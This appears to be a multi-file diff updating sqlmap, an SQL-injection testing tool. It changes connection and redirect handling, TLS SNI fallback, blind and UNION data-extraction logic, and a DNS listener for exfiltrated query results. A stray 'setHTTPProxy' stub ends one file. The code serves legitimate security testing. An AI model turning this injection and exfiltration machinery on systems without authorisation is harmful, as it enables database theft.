|
||||||
elif not kb.testMode:
|
elif not kb.testMode:
|
||||||
warnMsg = "it is very important not to stress the network adapter's "
|
warnMsg = "it is very important not to stress the network adapter "
|
||||||
warnMsg += "bandwidth during usage of time-based payloads"
|
warnMsg += "during usage of time-based payloads to prevent potential "
|
||||||
|
warnMsg += "errors "
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
if not kb.laggingChecked:
|
if not kb.laggingChecked:
|
||||||
|
@ -804,17 +1010,19 @@ class Connect(object):
|
||||||
if deviation > WARN_TIME_STDEV:
|
if deviation > WARN_TIME_STDEV:
|
||||||
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
|
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
|
||||||
|
|
||||||
warnMsg = "there is considerable lagging "
|
warnMsg = "considerable lagging has been detected "
|
||||||
warnMsg += "in connection response(s). Please use as high "
|
warnMsg += "in connection response(s). Please use as high "
|
||||||
warnMsg += "value for option '--time-sec' as possible (e.g. "
|
warnMsg += "value for option '--time-sec' as possible (e.g. "
|
||||||
warnMsg += "10 or more)"
|
warnMsg += "10 or more)"
|
||||||
logger.critical(warnMsg)
|
logger.critical(warnMsg)
|
||||||
|
|
||||||
|
if conf.safeFreq > 0:
|
||||||
if conf.safUrl and conf.saFreq > 0:
|
|
||||||
kb.queryCounter += 1
|
kb.queryCounter += 1
|
||||||
if kb.queryCounter % conf.saFreq == 0:
|
if kb.queryCounter % conf.safeFreq == 0:
|
||||||
Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
|
if conf.safeUrl:
|
||||||
|
Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
|
||||||
|
elif kb.safeReq:
|
||||||
|
Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers)
|
||||||
|
|
||||||
start = time.time()
|
start = time.time()
|
||||||
|
|
||||||
|
@ -827,12 +1035,9 @@ class Connect(object):
|
||||||
if kb.nullConnection == NULLCONNECTION.HEAD:
|
if kb.nullConnection == NULLCONNECTION.HEAD:
|
||||||
method = HTTPMETHOD.HEAD
|
method = HTTPMETHOD.HEAD
|
||||||
elif kb.nullConnection == NULLCONNECTION.RANGE:
|
elif kb.nullConnection == NULLCONNECTION.RANGE:
|
||||||
if not auxHeaders:
|
|
||||||
auxHeaders = {}
|
|
||||||
|
|
||||||
auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
|
auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
|
||||||
|
|
||||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||||
|
|
||||||
if headers:
|
if headers:
|
||||||
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
|
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
|
||||||
|
@ -844,7 +1049,7 @@ class Connect(object):
|
||||||
|
|
||||||
if not pageLength:
|
if not pageLength:
|
||||||
try:
|
try:
|
||||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||||
except MemoryError:
|
except MemoryError:
|
||||||
page, headers, code = None, None, None
|
page, headers, code = None, None, None
|
||||||
warnMsg = "site returned insanely large response"
|
warnMsg = "site returned insanely large response"
|
||||||
|
@ -881,3 +1086,6 @@ class Connect(object):
|
||||||
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
|
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
|
||||||
else:
|
else:
|
||||||
return comparison(page, headers, code, getRatioValue, pageLength)
|
return comparison(page, headers, code, getRatioValue, pageLength)
|
||||||
|
|
||||||
|
def setHTTPProxy(): # Cross-linked function
|
||||||
|
raise NotImplementedError
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -33,7 +33,7 @@ def direct(query, content=True):
|
||||||
query = agent.adjustLateValues(query)
|
query = agent.adjustLateValues(query)
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query:
|
if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper():
|
||||||
query = "%s FROM DUAL" % query
|
query = "%s FROM DUAL" % query
|
||||||
|
|
||||||
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
|
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
|
||||||
|
@ -50,7 +50,7 @@ def direct(query, content=True):
|
||||||
output = hashDBRetrieve(query, True, True)
|
output = hashDBRetrieve(query, True, True)
|
||||||
start = time.time()
|
start = time.time()
|
||||||
|
|
||||||
if not select and "EXEC " not in query:
|
if not select and "EXEC " not in query.upper():
|
||||||
_ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
|
_ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
|
||||||
elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query):
|
elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query):
|
||||||
output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)
|
output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -65,6 +65,7 @@ class DNSServer(object):
|
||||||
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||||
self._socket.bind(("", 53))
|
self._socket.bind(("", 53))
|
||||||
self._running = False
|
self._running = False
|
||||||
|
self._initialized = False
|
||||||
|
|
||||||
def pop(self, prefix=None, suffix=None):
|
def pop(self, prefix=None, suffix=None):
|
||||||
"""
|
"""
|
||||||
|
@ -91,6 +92,7 @@ class DNSServer(object):
|
||||||
def _():
|
def _():
|
||||||
try:
|
try:
|
||||||
self._running = True
|
self._running = True
|
||||||
|
self._initialized = True
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
data, addr = self._socket.recvfrom(1024)
|
data, addr = self._socket.recvfrom(1024)
|
||||||
|
@ -116,6 +118,9 @@ if __name__ == "__main__":
|
||||||
server = DNSServer()
|
server = DNSServer()
|
||||||
server.run()
|
server.run()
|
||||||
|
|
||||||
|
while not server._initialized:
|
||||||
|
time.sleep(0.1)
|
||||||
|
|
||||||
while server._running:
|
while server._running:
|
||||||
while True:
|
while True:
|
||||||
_ = server.pop()
|
_ = server.pop()
|
||||||
|
|
|
@ -1,14 +1,16 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import httplib
|
import httplib
|
||||||
import socket
|
import socket
|
||||||
|
import sys
|
||||||
import urllib2
|
import urllib2
|
||||||
|
|
||||||
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
|
|
||||||
|
@ -19,7 +21,7 @@ try:
|
||||||
except ImportError:
|
except ImportError:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
_protocols = [ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1]
|
_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))
|
||||||
|
|
||||||
class HTTPSConnection(httplib.HTTPSConnection):
|
class HTTPSConnection(httplib.HTTPSConnection):
|
||||||
"""
|
"""
|
||||||
|
@ -41,20 +43,42 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
||||||
|
|
||||||
success = False
|
success = False
|
||||||
|
|
||||||
for protocol in _protocols:
|
if not kb.tlsSNI:
|
||||||
try:
|
for protocol in _protocols:
|
||||||
sock = create_sock()
|
try:
|
||||||
_ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
|
sock = create_sock()
|
||||||
if _:
|
_ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
|
||||||
success = True
|
if _:
|
||||||
self.sock = _
|
success = True
|
||||||
_protocols.remove(protocol)
|
self.sock = _
|
||||||
_protocols.insert(0, protocol)
|
_protocols.remove(protocol)
|
||||||
break
|
_protocols.insert(0, protocol)
|
||||||
else:
|
break
|
||||||
sock.close()
|
else:
|
||||||
except ssl.SSLError, errMsg:
|
sock.close()
|
||||||
logger.debug("SSL connection error occured ('%s')" % errMsg)
|
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
|
||||||
|
self._tunnel_host = None
|
||||||
|
logger.debug("SSL connection error occurred ('%s')" % errMsg)
|
||||||
|
|
||||||
|
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
|
||||||
|
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
|
||||||
|
if not success and hasattr(ssl, "SSLContext"):
|
||||||
|
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
|
||||||
|
try:
|
||||||
|
sock = create_sock()
|
||||||
|
context = ssl.SSLContext(protocol)
|
||||||
|
_ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host)
|
||||||
|
if _:
|
||||||
|
kb.tlsSNI = success = True
|
||||||
|
self.sock = _
|
||||||
|
_protocols.remove(protocol)
|
||||||
|
_protocols.insert(0, protocol)
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
sock.close()
|
||||||
|
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
|
||||||
|
self._tunnel_host = None
|
||||||
|
logger.debug("SSL connection error occurred ('%s')" % errMsg)
|
||||||
|
|
||||||
if not success:
|
if not success:
|
||||||
raise SqlmapConnectionException("can't establish SSL connection")
|
raise SqlmapConnectionException("can't establish SSL connection")
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import EXPECTED
|
from lib.core.enums import EXPECTED
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.exception import SqlmapNotVulnerableException
|
from lib.core.exception import SqlmapNotVulnerableException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||||
|
@ -55,7 +56,7 @@ from lib.techniques.union.use import unionUse
|
||||||
def _goDns(payload, expression):
|
def _goDns(payload, expression):
|
||||||
value = None
|
value = None
|
||||||
|
|
||||||
if conf.dnsName and kb.dnsTest is not False:
|
if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None:
|
||||||
if kb.dnsTest is None:
|
if kb.dnsTest is None:
|
||||||
dnsTest(payload)
|
dnsTest(payload)
|
||||||
|
|
||||||
|
@ -71,7 +72,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
|
||||||
|
|
||||||
value = _goDns(payload, expression)
|
value = _goDns(payload, expression)
|
||||||
|
|
||||||
if value:
|
if value is not None:
|
||||||
return value
|
return value
|
||||||
|
|
||||||
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
|
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
|
||||||
|
@ -83,7 +84,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
|
||||||
expression = "SELECT %s FROM (%s)" % (field, expression)
|
expression = "SELECT %s FROM (%s)" % (field, expression)
|
||||||
|
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
||||||
expression += " AS %s" % randomStr(lowercase=True)
|
expression += " AS %s" % randomStr(lowercase=True, seed=hash(expression))
|
||||||
|
|
||||||
if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','):
|
if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','):
|
||||||
nulledCastedField = agent.nullAndCastField(field)
|
nulledCastedField = agent.nullAndCastField(field)
|
||||||
|
@ -198,7 +199,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
||||||
if isNumPosStrValue(count):
|
if isNumPosStrValue(count):
|
||||||
count = int(count)
|
count = int(count)
|
||||||
|
|
||||||
if batch:
|
if batch or count == 1:
|
||||||
stopLimit = count
|
stopLimit = count
|
||||||
else:
|
else:
|
||||||
message = "the SQL query provided can return "
|
message = "the SQL query provided can return "
|
||||||
|
@ -286,11 +287,21 @@ def _goBooleanProxy(expression):
|
||||||
|
|
||||||
initTechnique(kb.technique)
|
initTechnique(kb.technique)
|
||||||
|
|
||||||
|
if conf.dnsName:
|
||||||
|
query = agent.prefixQuery(kb.injection.data[kb.technique].vector)
|
||||||
|
query = agent.suffixQuery(query)
|
||||||
|
payload = agent.payload(newValue=query)
|
||||||
|
output = _goDns(payload, expression)
|
||||||
|
|
||||||
|
if output is not None:
|
||||||
|
return output
|
||||||
|
|
||||||
vector = kb.injection.data[kb.technique].vector
|
vector = kb.injection.data[kb.technique].vector
|
||||||
vector = vector.replace("[INFERENCE]", expression)
|
vector = vector.replace("[INFERENCE]", expression)
|
||||||
query = agent.prefixQuery(vector)
|
query = agent.prefixQuery(vector)
|
||||||
query = agent.suffixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
|
|
||||||
timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)
|
timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)
|
||||||
|
|
||||||
output = hashDBRetrieve(expression, checkConf=True)
|
output = hashDBRetrieve(expression, checkConf=True)
|
||||||
|
@ -333,6 +344,9 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
getCurrentThreadData().disableStdOut = suppressOutput
|
getCurrentThreadData().disableStdOut = suppressOutput
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
pushValue(conf.db)
|
||||||
|
pushValue(conf.tbl)
|
||||||
|
|
||||||
if expected == EXPECTED.BOOL:
|
if expected == EXPECTED.BOOL:
|
||||||
forgeCaseExpression = booleanExpression = expression
|
forgeCaseExpression = booleanExpression = expression
|
||||||
|
|
||||||
|
@ -357,10 +371,34 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
if not conf.forceDns:
|
if not conf.forceDns:
|
||||||
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||||
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
||||||
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
|
||||||
|
fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
|
||||||
|
|
||||||
|
try:
|
||||||
|
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||||
|
except SqlmapConnectionException:
|
||||||
|
if not fallback:
|
||||||
|
raise
|
||||||
|
|
||||||
count += 1
|
count += 1
|
||||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||||
|
|
||||||
|
if not found and fallback:
|
||||||
|
warnMsg = "something went wrong with full UNION "
|
||||||
|
warnMsg += "technique (could be because of "
|
||||||
|
warnMsg += "limitation on retrieved number of entries)"
|
||||||
|
if " FROM " in query.upper():
|
||||||
|
warnMsg += ". Falling back to partial UNION technique"
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
|
pushValue(kb.forcePartialUnion)
|
||||||
|
kb.forcePartialUnion = True
|
||||||
|
value = _goUnion(query, unpack, dump)
|
||||||
|
found = (value is not None) or (value is None and expectingNone)
|
||||||
|
kb.forcePartialUnion = popValue()
|
||||||
|
else:
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found:
|
if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found:
|
||||||
kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY
|
kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY
|
||||||
value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump)
|
value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump)
|
||||||
|
@ -404,14 +442,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
finally:
|
finally:
|
||||||
kb.resumeValues = True
|
kb.resumeValues = True
|
||||||
|
|
||||||
|
conf.tbl = popValue()
|
||||||
|
conf.db = popValue()
|
||||||
|
|
||||||
if suppressOutput is not None:
|
if suppressOutput is not None:
|
||||||
getCurrentThreadData().disableStdOut = popValue()
|
getCurrentThreadData().disableStdOut = popValue()
|
||||||
|
|
||||||
kb.safeCharEncode = False
|
kb.safeCharEncode = False
|
||||||
|
|
||||||
if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler:
|
if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
|
||||||
warnMsg = "in case of continuous data retrieval problems you are advised to try "
|
warnMsg = "in case of continuous data retrieval problems you are advised to try "
|
||||||
warnMsg += "a switch '--no-cast' or switch '--hex'"
|
warnMsg += "a switch '--no-cast' "
|
||||||
|
warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
return extractExpectedValue(value, expected)
|
return extractExpectedValue(value, expected)
|
||||||
|
@ -434,7 +476,7 @@ def goStacked(expression, silent=False):
|
||||||
query = agent.prefixQuery(";%s" % expression)
|
query = agent.prefixQuery(";%s" % expression)
|
||||||
query = agent.suffixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
|
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper())
|
||||||
|
|
||||||
def checkBooleanExpression(expression, expectingNone=True):
|
def checkBooleanExpression(expression, expectingNone=True):
|
||||||
return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
|
return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
|
||||||
|
|
|
@ -1,17 +1,16 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import urllib2
|
import urllib2
|
||||||
|
|
||||||
|
|
||||||
class MethodRequest(urllib2.Request):
|
class MethodRequest(urllib2.Request):
|
||||||
'''
|
"""
|
||||||
Used to create HEAD/PUT/DELETE/... requests with urllib2
|
Used to create HEAD/PUT/DELETE/... requests with urllib2
|
||||||
'''
|
"""
|
||||||
|
|
||||||
def set_method(self, method):
|
def set_method(self, method):
|
||||||
self.method = method.upper()
|
self.method = method.upper()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -10,14 +10,13 @@ import urllib2
|
||||||
|
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
|
|
||||||
class HTTPSCertAuthHandler(urllib2.HTTPSHandler):
|
class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
|
||||||
def __init__(self, key_file, cert_file):
|
def __init__(self, key_file):
|
||||||
urllib2.HTTPSHandler.__init__(self)
|
urllib2.HTTPSHandler.__init__(self)
|
||||||
self.key_file = key_file
|
self.key_file = key_file
|
||||||
self.cert_file = cert_file
|
|
||||||
|
|
||||||
def https_open(self, req):
|
def https_open(self, req):
|
||||||
return self.do_open(self.getConnection, req)
|
return self.do_open(self.getConnection, req)
|
||||||
|
|
||||||
def getConnection(self, host, timeout=None):
|
def getConnection(self, host, timeout=None):
|
||||||
return httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file, timeout=conf.timeout)
|
return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout)
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import types
|
||||||
import urllib2
|
import urllib2
|
||||||
import urlparse
|
import urlparse
|
||||||
|
|
||||||
|
from StringIO import StringIO
|
||||||
|
|
||||||
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.common import getHostHeader
|
from lib.core.common import getHostHeader
|
||||||
|
@ -57,8 +61,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||||
|
|
||||||
kb.resendPostOnRedirect = choice.upper() == 'Y'
|
kb.resendPostOnRedirect = choice.upper() == 'Y'
|
||||||
|
|
||||||
if kb.resendPostOnRedirect:
|
if kb.resendPostOnRedirect:
|
||||||
self.redirect_request = self._redirect_request
|
self.redirect_request = self._redirect_request
|
||||||
|
|
||||||
def _redirect_request(self, req, fp, code, msg, headers, newurl):
|
def _redirect_request(self, req, fp, code, msg, headers, newurl):
|
||||||
newurl = newurl.replace(' ', '%20')
|
newurl = newurl.replace(' ', '%20')
|
||||||
|
@ -103,17 +107,47 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)
|
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)
|
||||||
|
|
||||||
if redurl:
|
if redurl:
|
||||||
if not urlparse.urlsplit(redurl).netloc:
|
try:
|
||||||
redurl = urlparse.urljoin(req.get_full_url(), redurl)
|
if not urlparse.urlsplit(redurl).netloc:
|
||||||
|
redurl = urlparse.urljoin(req.get_full_url(), redurl)
|
||||||
|
|
||||||
self._infinite_loop_check(req)
|
self._infinite_loop_check(req)
|
||||||
self._ask_redirect_choice(code, redurl, req.get_method())
|
self._ask_redirect_choice(code, redurl, req.get_method())
|
||||||
|
except ValueError:
|
||||||
|
redurl = None
|
||||||
|
result = fp
|
||||||
|
|
||||||
if redurl and kb.redirectChoice == REDIRECTION.YES:
|
if redurl and kb.redirectChoice == REDIRECTION.YES:
|
||||||
req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
|
req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
|
||||||
if headers and HTTP_HEADER.SET_COOKIE in headers:
|
if headers and HTTP_HEADER.SET_COOKIE in headers:
|
||||||
req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(DEFAULT_COOKIE_DELIMITER)[0]
|
req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]
|
||||||
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
|
try:
|
||||||
|
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
|
||||||
|
except urllib2.HTTPError, e:
|
||||||
|
result = e
|
||||||
|
|
||||||
|
# Dirty hack for http://bugs.python.org/issue15701
|
||||||
|
try:
|
||||||
|
result.info()
|
||||||
|
except AttributeError:
|
||||||
|
def _(self):
|
||||||
|
return getattr(self, "hdrs") or {}
|
||||||
|
result.info = types.MethodType(_, result)
|
||||||
|
|
||||||
|
if not hasattr(result, "read"):
|
||||||
|
def _(self, length=None):
|
||||||
|
return e.msg
|
||||||
|
result.read = types.MethodType(_, result)
|
||||||
|
|
||||||
|
if not getattr(result, "url", None):
|
||||||
|
result.url = redurl
|
||||||
|
|
||||||
|
if not getattr(result, "code", None):
|
||||||
|
result.code = 999
|
||||||
|
except:
|
||||||
|
redurl = None
|
||||||
|
result = fp
|
||||||
|
fp.read = StringIO("").read
|
||||||
else:
|
else:
|
||||||
result = fp
|
result = fp
|
||||||
|
|
||||||
|
